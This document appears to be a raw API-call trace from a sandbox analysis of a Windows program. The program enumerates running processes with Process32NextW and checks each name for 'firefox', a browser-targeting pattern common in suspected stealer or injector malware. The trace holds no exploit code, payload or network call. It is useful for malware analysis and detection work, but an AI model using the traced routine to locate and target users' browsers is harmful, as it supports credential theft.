WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.834] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35716f0 [0094.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x35716f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0094.834] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0094.834] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox") returned 0x0 [0094.834] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.835] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35714f8 [0094.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35714f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0094.835] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0094.835] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox") returned 0x0 [0094.835] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0094.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.836] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571750 [0094.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3571750, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0094.836] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0094.836] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox") returned 0x0 [0094.836] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0094.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.837] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571720 [0094.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3571720, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0094.838] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0094.838] StrStrIA (lpFirst="services.exe", lpSrch="firefox") returned 0x0 [0094.838] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0094.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.839] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571510 [0094.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3571510, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0094.839] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0094.839] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox") returned 0x0 [0094.839] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.840] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571738 [0094.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571738, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.840] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.840] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.840] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0094.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.861] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3571480 [0094.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571480, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0094.861] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0094.861] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="firefox") returned 0x0 [0094.861] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0094.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.863] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3571498 [0094.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571498, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0094.863] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0094.863] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="firefox") returned 0x0 [0094.863] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.864] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571528 [0094.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571528, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.864] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.864] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.864] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0094.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.866] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35478e8 [0094.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x35478e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0094.866] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0094.866] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox") returned 0x0 [0094.866] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.867] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35714b0 [0094.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35714b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.867] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.867] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.867] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.868] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35714c8 [0094.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35714c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.868] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.868] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.868] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.870] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35714e0 [0094.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35714e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.870] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.870] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.870] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.871] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35717e0 [0094.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35717e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.871] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.871] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.871] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.872] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35719a8 [0094.872] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35719a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.872] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.872] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.872] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.874] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35719c0 [0094.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35719c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.874] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.874] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.874] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.875] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571a38 [0094.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571a38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.875] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.875] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.875] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.877] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571948 [0094.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571948, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.877] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.877] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.877] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.894] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35719d8 [0094.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35719d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.894] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.894] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.894] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.895] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571840 [0094.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.895] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.895] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.896] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0094.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.897] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571870 [0094.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3571870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0094.897] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0094.897] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox") returned 0x0 [0094.897] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.898] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571a50 [0094.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571a50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.898] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.898] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.898] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0094.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.899] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571768 [0094.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3571768, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0094.899] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0094.899] StrStrIA (lpFirst="audiodg.exe", lpSrch="firefox") returned 0x0 [0094.899] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0094.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.901] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571a20 